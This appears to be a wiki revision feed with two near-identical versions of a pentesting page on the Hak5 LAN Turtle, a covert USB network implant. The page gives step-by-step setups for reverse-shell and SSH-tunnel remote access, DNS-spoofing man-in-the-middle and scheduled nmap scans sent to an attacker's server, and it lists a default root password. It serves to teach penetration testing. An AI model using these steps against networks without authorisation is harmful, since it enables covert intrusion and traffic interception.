* Ubuntu host computer&lt;br /&gt;
* [[ESP-32 NodeMCU Development Board]]&lt;br /&gt;
* Micro USB cable&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* http://www.hackgnar.com/2018/06/learning-bluetooth-hackery-with-ble-ctf.html?m=1&lt;br /&gt;
* https://docs.espressif.com/projects/esp-idf/en/latest/get-started/#setup-toolchain&lt;br /&gt;
* https://docs.espressif.com/projects/esp-idf/en/latest/get-started/add-idf_path-to-profile.html&lt;br /&gt;
* https://docs.espressif.com/projects/esp-idf/en/latest/get-started/establish-serial-connection.html&lt;br /&gt;
* https://github.com/hackgnar/ble_ctf/blob/master/docs/setup.md&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6101</id>
		<title>Hak5 LAN Turtle</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6101"/>
		<updated>2021-03-10T13:41:14Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Use Cases */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:LANTurtle.jpg |thumb|right|400px||LAN Turtle and Field Guide]]&lt;br /&gt;
The LAN turtle is a tool for penetration testers and system administrators disguised as a simple USB Ethernet adapter. It provides possibilities to perform remote access, man-in-the-middle and information gathering attacks. These functions are provided by the turtle modules which are preinstalled on the LAN turtle. The modules are based on the OpenWRT platform which allow users to add customized modules. The turtle itself is covert by a generic USB to Ethernet adapter and can therefore be placed unnoticed in IT infrastructures.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting up the LAN Turtle ===&lt;br /&gt;
&lt;br /&gt;
# Plug the LAN turtle into one of the USB ports of your computer.&lt;br /&gt;
# Your computer will get an 172.16.84.x address as soon as the startup sequence of the turtle finished. If not, then you have to statically configure an IP out of the 172.16.84.0/24 range.&lt;br /&gt;
# Connect to the turtle with &amp;lt;code&amp;gt;ssh root@172.16.84.1&amp;lt;/code&amp;gt; and enter the password &amp;lt;code&amp;gt;sh3llz&amp;lt;/code&amp;gt;&lt;br /&gt;
# The simplistic graphical shell interface will prompt you to change the password but the old one is also allowed.&lt;br /&gt;
# Then the LAN turtle can be configured and modules can be installed within the interface. &lt;br /&gt;
# If you end the interface you will be greeted with an normal Linux shell but you can open it again with the &amp;lt;code&amp;gt;turtle&amp;lt;/code&amp;gt; command&lt;br /&gt;
&lt;br /&gt;
=== Updating firmware (optional) ===&lt;br /&gt;
To ensure the best performance and compatability you should update the firmware regularly. This requires an internet conneciton.&lt;br /&gt;
&lt;br /&gt;
# Select &amp;lt;code&amp;gt;Config&amp;lt;/code&amp;gt; in the Main Menu and press select.&lt;br /&gt;
# Go to &amp;lt;code&amp;gt;Check for updates&amp;lt;/code&amp;gt; and press select to start the update process.&lt;br /&gt;
# Wait till the update finishes.&lt;br /&gt;
&lt;br /&gt;
=== Factory Reset (optional)===&lt;br /&gt;
In the extreme case that a LAN Turtle has become permanently inaccessible or inoperative, there is a quick method for recovery using a special web interface.&lt;br /&gt;
# Download the latest LAN Turtle factory image from the [https://downloads.hak5.org/ official download center]. Note: Choose the factory recovery image.&lt;br /&gt;
# Open the LAN Turtle carefully. There are 2 screws under the sticker.&lt;br /&gt;
# Now you need to find the reset button/jumper contact. You can find a video on how to locate [https://www.youtube.com/watch?v=ubNin_79wxE here].&lt;br /&gt;
# Hold down the button/jumper while you&#039;re plugging the LAN Turtle in your PC and keep holding it for 5 more seconds.&lt;br /&gt;
# Go to http://192.168.1.1 for the firmware web recovery tool and upload the image to the LAN Turtle.&lt;br /&gt;
# Wait 5-10 minutes for the recovery to finish, the LAN Turtle will indicate it with a special LED blink pattern. Watch the video for the LED Pattern to know when the recovery has finished.&lt;br /&gt;
&lt;br /&gt;
=== Using the turtle modules ===&lt;br /&gt;
&lt;br /&gt;
The LAN turtle comes packed with pre-installed tools. Furthermore it is possible to program your own or download them from the internet and configure them with the module manager as well.&lt;br /&gt;
&lt;br /&gt;
[[File:LANTurtleModules.jpg|400px||LAN Turtle configuration shell interface]]&lt;br /&gt;
&lt;br /&gt;
==== Manually download turtle modules ====&lt;br /&gt;
If the module manager doesn&#039;t work you need to manually download turtle modules. You can do that in the console of the lan turtle, just exit the main menu.&lt;br /&gt;
You can download modules from the [https://github.com/hak5/lanturtle-modules/tree/gh-pages/modules official hak5 github].&lt;br /&gt;
&lt;br /&gt;
# Change directory to &amp;lt;code&amp;gt;/etc/turtle/modules&amp;lt;/code&amp;gt;&lt;br /&gt;
# Download modules with &amp;lt;code&amp;gt;wget &amp;lt;link&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
# Make the file an executeable &amp;lt;code&amp;gt;chmod +x &amp;lt;file&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== AutoSSH ====&lt;br /&gt;
&lt;br /&gt;
AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-established by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.&lt;br /&gt;
*&amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.&lt;br /&gt;
*&amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; - The port number from which the remote server will bind.&lt;br /&gt;
*&amp;lt;code&amp;gt;listen port&amp;lt;/code&amp;gt; - The port number to which the remote port will bind.&lt;br /&gt;
&lt;br /&gt;
Example: Per the defaults, the remote server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the public server, and then from there establishing an SSH connection to port 2222.&lt;br /&gt;
&lt;br /&gt;
==== Cron ====&lt;br /&gt;
Cron is a job scheduler which can be used to start and stop modules at specific times or regular intervals using the &#039;start&#039; and &#039;stop&#039; commands.&lt;br /&gt;
&lt;br /&gt;
==== DNSSpoof ====&lt;br /&gt;
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. For example, the IP address returned for a client lookup of the domain \&amp;quot;example.com\&amp;quot; can be replaced with that of the LAN Turtle itself, or a 3rd party server. In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.&lt;br /&gt;
&lt;br /&gt;
==== Keymanager ====&lt;br /&gt;
With this tool you can create RSA keypairs and copy them to the public server. This is needed when AutoSSH is configured.&lt;br /&gt;
&lt;br /&gt;
==== Meterpreter ====&lt;br /&gt;
This module deploys an persistent shell to the Metasploit Framework of an other Machine.&lt;br /&gt;
&lt;br /&gt;
==== Nmap-Scan ====&lt;br /&gt;
This module uses &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; for discovering running devices and their port of the current LAN network.&lt;br /&gt;
&lt;br /&gt;
==== OpenVPN ====&lt;br /&gt;
OpenVPN enables remote access the LAN Turtle and optionally the network on which it resides. It allows to send the captured data to your operating network.&lt;br /&gt;
&lt;br /&gt;
==== SSHFS====&lt;br /&gt;
SSHFS (Secure SHell FileSystem) is a file system for Linux (and other operating systems with a FUSE implementation, such as Mac OS X or FreeBSD) capable of operating on files on a remote computer using just a secure shell login on the remote computer. On the local computer where the SSHFS is mounted, the implementation makes use of the FUSE (Filesystem in Userspace) kernel module. The practical effect of this is that the end user can seamlessly interact with remote files being securely served over SSH just as if they were local files on his/her computer. On the remote computer the SFTP subsystem of SSH is used.&lt;br /&gt;
&lt;br /&gt;
==== URLSnarf ====&lt;br /&gt;
URLSnarf allows you to capture which websites were accessed by the plugged in computer. URLSnarf only works with HTTP webpages which are hard to find today.&lt;br /&gt;
&lt;br /&gt;
==== NetCat Reverse Shell ====&lt;br /&gt;
The netcat reverse shell provides you with remote access to the lan turtle and thus persistent access to the network.&lt;br /&gt;
&lt;br /&gt;
==== Tortle ====&lt;br /&gt;
Tortle makes the turtle act as an TOR Gateway. It enables you to setup several services.&lt;br /&gt;
&lt;br /&gt;
== Use Cases==&lt;br /&gt;
&lt;br /&gt;
The LAN turtle can be deployed in various use cases, which can be divided into four categories:&lt;br /&gt;
* remote access attacks with AutoSSH or OpenVPN or NetCat Reverse Shell&lt;br /&gt;
* man-in-the-middle attacks with URLSnarf or DNSSpoof&lt;br /&gt;
* information gathering with Nmap-Scan&lt;br /&gt;
* deploy service with via TOR-network&lt;br /&gt;
&lt;br /&gt;
Remote access attacks are used to gain access to a private network from a remote place in order to start further attacks from the inside network. This makes it a lot more easier because the attack itself does not have to bypass a router or firewall. All the attacker needs is the pre-configured LAN turtle inside the network and a remote server on the internet. To perform a remote access, the LAN turtle builds up a tunnel to the remote server so the firewall cannot capture the traffic. Finally the attacker can access the LAN turtle through the tunnel from the remote server. This attack can be performed with the modules AutoSSH or OpenVPN.&lt;br /&gt;
&lt;br /&gt;
The LAN turtle also allows man-in-the-middle attacks, where the turtle can intercept the communication between two parties. To perform such an attack, the LAN turtle must be connected to an USB port of the victim host and to a network cable which connects the host to the internal LAN. Now the whole traffic of the victim host goes over the LAN turtle and can be logged or altered. An attacker can use URLSnarf or DNSSpoof to perform such an attack.&lt;br /&gt;
&lt;br /&gt;
The third use case is information gathering. The aim of this attack is to receive information about the topology, the hosts and the protocols of an internal network in order to perform further attacks. This can be done with the modules like Nmap-Scan.&lt;br /&gt;
&lt;br /&gt;
The following step-by-step instructions will outline how to configure the LAN turtle in order to perform the different types of attacks.&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with AutoSSH ===&lt;br /&gt;
In this example consider an internal network which is secured by a firewall and a public server in the internet controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Generate RSA keypairs with Keymanager ====&lt;br /&gt;
# Open the Keymanager module and select &amp;lt;code&amp;gt;generate_key&amp;lt;/code&amp;gt;&lt;br /&gt;
# Select &amp;lt;code&amp;gt;copy_key&amp;lt;/code&amp;gt; and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; remote SSH server port (typically 22)&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; user on the remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;password&amp;lt;/code&amp;gt; password for the user on the remote host&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure AutoSSH ====&lt;br /&gt;
# Open AutoSSH and insert the following parameters:&lt;br /&gt;
#* &amp;lt;code&amp;gt;user@host&amp;lt;/code&amp;gt; user and host to establish the SSH tunnel&lt;br /&gt;
#* &amp;lt;code&amp;gt;remote port&amp;lt;/code&amp;gt; remote port to bind through the SSH tunnel (default 2222)&lt;br /&gt;
#* &amp;lt;code&amp;gt;local port&amp;lt;/code&amp;gt; local port to bind tunnel (default 22)&lt;br /&gt;
# Submit the changes and start AutoSSH (or enable it for autostart)&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Access LAN turtle from remote server ====&lt;br /&gt;
# Connect to the remote server&lt;br /&gt;
# Connect locally to the remote port of the AutoSSH configuration by &amp;lt;code&amp;gt;ssh root@localhost:2222&amp;lt;/code&amp;gt;&lt;br /&gt;
# You are now on the LAN turtle, continue with further attacks&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with NetCat Reverse Shell ===&lt;br /&gt;
==== Step 1: Start NetCat server on your host machine ====&lt;br /&gt;
* First you need to setup a netcat connection on your host machine that listens to incoming connections. To start NetCat server execute &amp;lt;code&amp;gt;nc -lvp 4444&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure NetCat Reverse Shell ====&lt;br /&gt;
# Open the NetCat Reverse Shell module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Enter your host machines ip address and the port of the nc server. In our case 4444.&lt;br /&gt;
# Start the module on the LAN Turtle.&lt;br /&gt;
&lt;br /&gt;
==== Step 3: Exploit ====&lt;br /&gt;
When the reverse shell connected to your host machine you can execute commands on the lan turtle over the reverse shell.&lt;br /&gt;
&lt;br /&gt;
=== Man-in-the-middle attacks with DNSSpoof ===&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure the spoofhost file ====&lt;br /&gt;
# Open the DNSSpoof module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Add the DNS entries that the LAN turtle should spoof by entering the IP address and the spoofed DNS name&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Place the LAN turtle in the network ====&lt;br /&gt;
After configuring the spoofed hosts, place the LAN turtle on the victim computer by simply plugging the turtle into an USB port of the computer and the network cable into the LAN turtle.&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering with nmap ===&lt;br /&gt;
As an example project we use the following modules:&lt;br /&gt;
* Cron to periodically start the attack&lt;br /&gt;
* SSHFS to save the caputred information in a file on the remote server&lt;br /&gt;
* Nmap-Scan to sniff the configuration and devices of the network&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure SSHFS ====&lt;br /&gt;
# Access the SSHFS module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; IP address of the remote server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; 22&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; the username&lt;br /&gt;
#* &amp;lt;code&amp;gt;path&amp;lt;/code&amp;gt; This can be left blank if you want to use the users home directory&lt;br /&gt;
# Start SSHFS and enable it for start up&lt;br /&gt;
&lt;br /&gt;
==== Step 2: nmap-scan ====&lt;br /&gt;
# Access the nmap-scan module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* target: &amp;lt;code&amp;gt;192.168.0.1-255&amp;lt;/code&amp;gt; (This may differ for our network)&lt;br /&gt;
#* logflie: &amp;lt;code&amp;gt;/sshfs/&amp;lt;/code&amp;gt;&lt;br /&gt;
#* use the desired attack profile&lt;br /&gt;
#* save the configuration with execute&lt;br /&gt;
&lt;br /&gt;
==== Step 3: cron job ====&lt;br /&gt;
# add in the con config &amp;lt;code&amp;gt;*/15 * * * * start nmap-scan&amp;lt;/code&amp;gt;&lt;br /&gt;
This line start an nmap-scan every 15 minutes.&lt;br /&gt;
&lt;br /&gt;
=== Deploy services via TOR with Tortle ===&lt;br /&gt;
==== Hidden Service ====&lt;br /&gt;
Onion Host sets up a hidden service inside the TOR network. By default it is a TORShell (SSH within TOR).&lt;br /&gt;
==== Proxy &amp;amp; Gateway configuration ====&lt;br /&gt;
TORGateway, if enabled, automatically and conveniently tunnels ALL eth0 traffic through TOR Transparent Proxy. TOR Proxy is just the regular SOCKS proxy through TOR.&lt;br /&gt;
==== Bridge configurtation ====&lt;br /&gt;
Bridges can be used to avoid blocking of the standard tor relays.&lt;br /&gt;
==== HTTP Proxy configuration ====&lt;br /&gt;
HTTP Proxy can be configured to control internet access.&lt;br /&gt;
==== HTTPS Proxy configuration ====&lt;br /&gt;
HTTPS Proxy can be configured to control internet access.&lt;br /&gt;
==== Firewall configuration ====&lt;br /&gt;
You can configure a firewall that restricts access to serveral ports.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[LAN Turtle]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000979313-LAN-Turtle&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6100</id>
		<title>Hak5 LAN Turtle</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_LAN_Turtle&amp;diff=6100"/>
		<updated>2021-03-10T12:37:29Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Description */  Added Tortle.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:LANTurtle.jpg |thumb|right|400px||LAN Turtle and Field Guide]]&lt;br /&gt;
The LAN turtle is a tool for penetration testers and system administrators disguised as a simple USB Ethernet adapter. It provides possibilities to perform remote access, man-in-the-middle and information gathering attacks. These functions are provided by the turtle modules which are preinstalled on the LAN turtle. The modules are based on the OpenWRT platform which allow users to add customized modules. The turtle itself is covert by a generic USB to Ethernet adapter and can therefore be placed unnoticed in IT infrastructures.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Setting up the LAN Turtle ===&lt;br /&gt;
&lt;br /&gt;
# Plug the LAN turtle into one of the USB ports of your computer.&lt;br /&gt;
# Your computer will get an 172.16.84.x address as soon as the startup sequence of the turtle finished. If not, then you have to statically configure an IP out of the 172.16.84.0/24 range.&lt;br /&gt;
# Connect to the turtle with &amp;lt;code&amp;gt;ssh root@172.16.84.1&amp;lt;/code&amp;gt; and enter the password &amp;lt;code&amp;gt;sh3llz&amp;lt;/code&amp;gt;&lt;br /&gt;
# The simplistic graphical shell interface will prompt you to change the password but the old one is also allowed.&lt;br /&gt;
# Then the LAN turtle can be configured and modules can be installed within the interface. &lt;br /&gt;
# If you end the interface you will be greeted with an normal Linux shell but you can open it again with the &amp;lt;code&amp;gt;turtle&amp;lt;/code&amp;gt; command&lt;br /&gt;
&lt;br /&gt;
=== Updating firmware (optional) ===&lt;br /&gt;
To ensure the best performance and compatability you should update the firmware regularly. This requires an internet conneciton.&lt;br /&gt;
&lt;br /&gt;
# Select &amp;lt;code&amp;gt;Config&amp;lt;/code&amp;gt; in the Main Menu and press select.&lt;br /&gt;
# Go to &amp;lt;code&amp;gt;Check for updates&amp;lt;/code&amp;gt; and press select to start the update process.&lt;br /&gt;
# Wait till the update finishes.&lt;br /&gt;
&lt;br /&gt;
=== Factory Reset (optional)===&lt;br /&gt;
In the extreme case that a LAN Turtle has become permanently inaccessible or inoperative, there is a quick method for recovery using a special web interface.&lt;br /&gt;
# Download the latest LAN Turtle factory image from the [https://downloads.hak5.org/ official download center]. Note: Choose the factory recovery image.&lt;br /&gt;
# Open the LAN Turtle carefully. There are 2 screws under the sticker.&lt;br /&gt;
# Now you need to find the reset button/jumper contact. You can find a video on how to locate [https://www.youtube.com/watch?v=ubNin_79wxE here].&lt;br /&gt;
# Hold down the button/jumper while you&#039;re plugging the LAN Turtle in your PC and keep holding it for 5 more seconds.&lt;br /&gt;
# Go to http://192.168.1.1 for the firmware web recovery tool and upload the image to the LAN Turtle.&lt;br /&gt;
# Wait 5-10 minutes for the recovery to finish, the LAN Turtle will indicate it with a special LED blink pattern. Watch the video for the LED Pattern to know when the recovery has finished.&lt;br /&gt;
&lt;br /&gt;
=== Using the turtle modules ===&lt;br /&gt;
&lt;br /&gt;
The LAN turtle comes packed with pre-installed tools. Furthermore it is possible to program your own or download them from the internet and configure them with the module manager as well.&lt;br /&gt;
&lt;br /&gt;
[[File:LANTurtleModules.jpg|400px||LAN Turtle configuration shell interface]]&lt;br /&gt;
&lt;br /&gt;
==== Manually download turtle modules ====&lt;br /&gt;
If the module manager doesn&#039;t work you need to manually download turtle modules. You can do that in the console of the lan turtle, just exit the main menu.&lt;br /&gt;
You can download modules from the [https://github.com/hak5/lanturtle-modules/tree/gh-pages/modules official hak5 github].&lt;br /&gt;
&lt;br /&gt;
# Change directory to &amp;lt;code&amp;gt;/etc/turtle/modules&amp;lt;/code&amp;gt;&lt;br /&gt;
# Download modules with &amp;lt;code&amp;gt;wget &amp;lt;link&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
# Make the file an executeable &amp;lt;code&amp;gt;chmod +x &amp;lt;file&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== AutoSSH ====&lt;br /&gt;
&lt;br /&gt;
AutoSSH is a service which provides persistent SSH connections. If an SSH session drops, it will be quickly re-established by AutoSSH. This service is typically used to provide a convenient and persistent reverse shell into the LAN Turtle on the standard SSH port 22 - though it may be configured with any standard SSH parameters to forward any arbitrary port.&lt;br /&gt;
*&amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; - The username and hostname (DNS or IP) separated by @ for which to establish the SSH connection.&lt;br /&gt;
*&amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; - The port number from which the remote server will bind.&lt;br /&gt;
*&amp;lt;code&amp;gt;listen port&amp;lt;/code&amp;gt; - The port number to which the remote port will bind.&lt;br /&gt;
&lt;br /&gt;
Example: Per the defaults, the remote server will bind its local port 2222 back to the LAN Turtle port 22. In this scenario one may establish a persistent connection to their LAN Turtle from this reverse shell by first connecting to the public server, and then from there establishing an SSH connection to port 2222.&lt;br /&gt;
&lt;br /&gt;
==== Cron ====&lt;br /&gt;
Cron is a job scheduler which can be used to start and stop modules at specific times or regular intervals using the &#039;start&#039; and &#039;stop&#039; commands.&lt;br /&gt;
&lt;br /&gt;
==== DNSSpoof ====&lt;br /&gt;
DNSSpoof forges replies to arbitrary DNS address / pointer queries on the LAN. This is useful in bypassing hostname-based access controls, or in implementing a variety of man-in-the-middle attacks. For example, the IP address returned for a client lookup of the domain \&amp;quot;example.com\&amp;quot; can be replaced with that of the LAN Turtle itself, or a 3rd party server. In this scenario, the computer connected to the Internet through the LAN Turtle attempting to browse to this domain may be redirected to the spoofed IP.&lt;br /&gt;
&lt;br /&gt;
==== Keymanager ====&lt;br /&gt;
With this tool you can create RSA keypairs and copy them to the public server. This is needed when AutoSSH is configured.&lt;br /&gt;
&lt;br /&gt;
==== Meterpreter ====&lt;br /&gt;
This module deploys an persistent shell to the Metasploit Framework of an other Machine.&lt;br /&gt;
&lt;br /&gt;
==== Nmap-Scan ====&lt;br /&gt;
This module uses &amp;lt;code&amp;gt;nmap&amp;lt;/code&amp;gt; for discovering running devices and their port of the current LAN network.&lt;br /&gt;
&lt;br /&gt;
==== OpenVPN ====&lt;br /&gt;
OpenVPN enables remote access the LAN Turtle and optionally the network on which it resides. It allows to send the captured data to your operating network.&lt;br /&gt;
&lt;br /&gt;
==== SSHFS====&lt;br /&gt;
SSHFS (Secure SHell FileSystem) is a file system for Linux (and other operating systems with a FUSE implementation, such as Mac OS X or FreeBSD) capable of operating on files on a remote computer using just a secure shell login on the remote computer. On the local computer where the SSHFS is mounted, the implementation makes use of the FUSE (Filesystem in Userspace) kernel module. The practical effect of this is that the end user can seamlessly interact with remote files being securely served over SSH just as if they were local files on his/her computer. On the remote computer the SFTP subsystem of SSH is used.&lt;br /&gt;
&lt;br /&gt;
==== URLSnarf ====&lt;br /&gt;
URLSnarf allows you to capture which websites were accessed by the plugged in computer. URLSnarf only works with HTTP webpages which are hard to find today.&lt;br /&gt;
&lt;br /&gt;
==== NetCat Reverse Shell ====&lt;br /&gt;
The netcat reverse shell provides you with remote access to the lan turtle and thus persistent access to the network.&lt;br /&gt;
&lt;br /&gt;
==== Tortle ====&lt;br /&gt;
Tortle makes the turtle act as an TOR Gateway. It enables you to setup several services.&lt;br /&gt;
&lt;br /&gt;
== Use Cases==&lt;br /&gt;
&lt;br /&gt;
The LAN turtle can be deployed in various use cases, which can be divided into three categories:&lt;br /&gt;
* remote access attacks with AutoSSH or OpenVPN or NetCat Reverse Shell&lt;br /&gt;
* man-in-the-middle attacks with URLSnarf or DNSSpoof&lt;br /&gt;
* information gathering with Nmap-Scan&lt;br /&gt;
&lt;br /&gt;
Remote access attacks are used to gain access to a private network from a remote place in order to start further attacks from the inside network. This makes it a lot more easier because the attack itself does not have to bypass a router or firewall. All the attacker needs is the pre-configured LAN turtle inside the network and a remote server on the internet. To perform a remote access, the LAN turtle builds up a tunnel to the remote server so the firewall cannot capture the traffic. Finally the attacker can access the LAN turtle through the tunnel from the remote server. This attack can be performed with the modules AutoSSH or OpenVPN.&lt;br /&gt;
&lt;br /&gt;
The LAN turtle also allows man-in-the-middle attacks, where the turtle can intercept the communication between two parties. To perform such an attack, the LAN turtle must be connected to an USB port of the victim host and to a network cable which connects the host to the internal LAN. Now the whole traffic of the victim host goes over the LAN turtle and can be logged or altered. An attacker can use URLSnarf or DNSSpoof to perform such an attack.&lt;br /&gt;
&lt;br /&gt;
The last use case is information gathering. The aim of this attack is to receive information about the topology, the hosts and the protocols of an internal network in order to perform further attacks. This can be done with the modules like Nmap-Scan.&lt;br /&gt;
&lt;br /&gt;
The following step-by-step instructions will outline how to configure the LAN turtle in order to perform the different types of attacks.&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with AutoSSH ===&lt;br /&gt;
In this example consider an internal network which is secured by a firewall and a public server in the internet controlled by the attacker.&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Generate RSA keypairs with Keymanager ====&lt;br /&gt;
# Open the Keymanager module and select &amp;lt;code&amp;gt;generate_key&amp;lt;/code&amp;gt;&lt;br /&gt;
# Select &amp;lt;code&amp;gt;copy_key&amp;lt;/code&amp;gt; and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; remote SSH server port (typically 22)&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; user on the remote SSH server&lt;br /&gt;
#* &amp;lt;code&amp;gt;password&amp;lt;/code&amp;gt; password for the user on the remote host&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure AutoSSH ====&lt;br /&gt;
# Open AutoSSH and insert the following parameters:&lt;br /&gt;
#* &amp;lt;code&amp;gt;user@host&amp;lt;/code&amp;gt; user and host to establish the SSH tunnel&lt;br /&gt;
#* &amp;lt;code&amp;gt;remote port&amp;lt;/code&amp;gt; remote port to bind through the SSH tunnel (default 2222)&lt;br /&gt;
#* &amp;lt;code&amp;gt;local port&amp;lt;/code&amp;gt; local port to bind tunnel (default 22)&lt;br /&gt;
# Submit the changes and start AutoSSH (or enable it for autostart)&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Access LAN turtle from remote server ====&lt;br /&gt;
# Connect to the remote server&lt;br /&gt;
# Connect locally to the remote port of the AutoSSH configuration by &amp;lt;code&amp;gt;ssh root@localhost:2222&amp;lt;/code&amp;gt;&lt;br /&gt;
# You are now on the LAN turtle, continue with further attacks&lt;br /&gt;
&lt;br /&gt;
=== Remote access attacks with NetCat Reverse Shell ===&lt;br /&gt;
==== Step 1: Start NetCat server on your host machine ====&lt;br /&gt;
* First you need to setup a netcat connection on your host machine that listens to incoming connections. To start NetCat server execute &amp;lt;code&amp;gt;nc -lvp 4444&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Configure NetCat Reverse Shell ====&lt;br /&gt;
# Open the NetCat Reverse Shell module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Enter your host machines ip address and the port of the nc server. In our case 4444.&lt;br /&gt;
# Start the module on the LAN Turtle.&lt;br /&gt;
&lt;br /&gt;
==== Step 3: Exploit ====&lt;br /&gt;
When the reverse shell connected to your host machine you can execute commands on the lan turtle over the reverse shell.&lt;br /&gt;
&lt;br /&gt;
=== Man-in-the-middle attacks with DNSSpoof ===&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure the spoofhost file ====&lt;br /&gt;
# Open the DNSSpoof module and go to &amp;quot;Configure&amp;quot;&lt;br /&gt;
# Add the DNS entries that the LAN turtle should spoof by entering the IP address and the spoofed DNS name&lt;br /&gt;
&lt;br /&gt;
==== Step 2: Place the LAN turtle in the network ====&lt;br /&gt;
After configuring the spoofed hosts, place the LAN turtle on the victim computer by simply plugging the turtle into an USB port of the computer and the network cable into the LAN turtle.&lt;br /&gt;
&lt;br /&gt;
=== Information Gathering with nmap ===&lt;br /&gt;
As an example project we use the following modules:&lt;br /&gt;
* Cron to periodically start the attack&lt;br /&gt;
* SSHFS to save the caputred information in a file on the remote server&lt;br /&gt;
* Nmap-Scan to sniff the configuration and devices of the network&lt;br /&gt;
&lt;br /&gt;
==== Step 1: Configure SSHFS ====&lt;br /&gt;
# Access the SSHFS module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; IP address of the remote server&lt;br /&gt;
#* &amp;lt;code&amp;gt;port&amp;lt;/code&amp;gt; 22&lt;br /&gt;
#* &amp;lt;code&amp;gt;user&amp;lt;/code&amp;gt; the username&lt;br /&gt;
#* &amp;lt;code&amp;gt;path&amp;lt;/code&amp;gt; This can be left blank if you want to use the users home directory&lt;br /&gt;
# Start SSHFS and enable it for start up&lt;br /&gt;
&lt;br /&gt;
==== Step 2: nmap-scan ====&lt;br /&gt;
# Access the nmap-scan module via the module manager&lt;br /&gt;
# Go to the configure tab and insert&lt;br /&gt;
#* target: &amp;lt;code&amp;gt;192.168.0.1-255&amp;lt;/code&amp;gt; (This may differ for our network)&lt;br /&gt;
#* logflie: &amp;lt;code&amp;gt;/sshfs/&amp;lt;/code&amp;gt;&lt;br /&gt;
#* use the desired attack profile&lt;br /&gt;
#* save the configuration with execute&lt;br /&gt;
&lt;br /&gt;
==== Step 3: cron job ====&lt;br /&gt;
